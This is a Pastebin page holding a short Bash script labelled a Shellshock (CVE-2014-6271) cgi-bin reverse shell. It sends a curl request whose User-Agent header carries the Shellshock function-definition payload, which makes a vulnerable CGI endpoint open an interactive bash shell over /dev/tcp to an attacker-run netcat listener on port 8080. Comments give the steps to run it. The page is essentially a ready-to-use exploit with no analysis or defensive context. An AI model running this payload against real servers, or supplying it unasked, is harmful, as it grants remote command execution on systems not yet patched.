Advertisement
Guest User

Untitled

a guest
Sep 28th, 2014
972
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.29 KB | None | 0 0
  1. #!/bin/bash
  2. echo little shellshock CVE-2014-6271 cgi-bin reverse shell script by @jroliva
  3. # step 1.- #nc -lp 8080 -vvv
  4. # step 2.-  #./little-shellshock-reverse.sh localhostIP attackhostIP
  5. /usr/bin/curl -A "() { foo;};echo;/bin/bash -i > /dev/tcp/$1/8080 0<&1 2>&1" http://$2/cgi-bin/test.cgi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement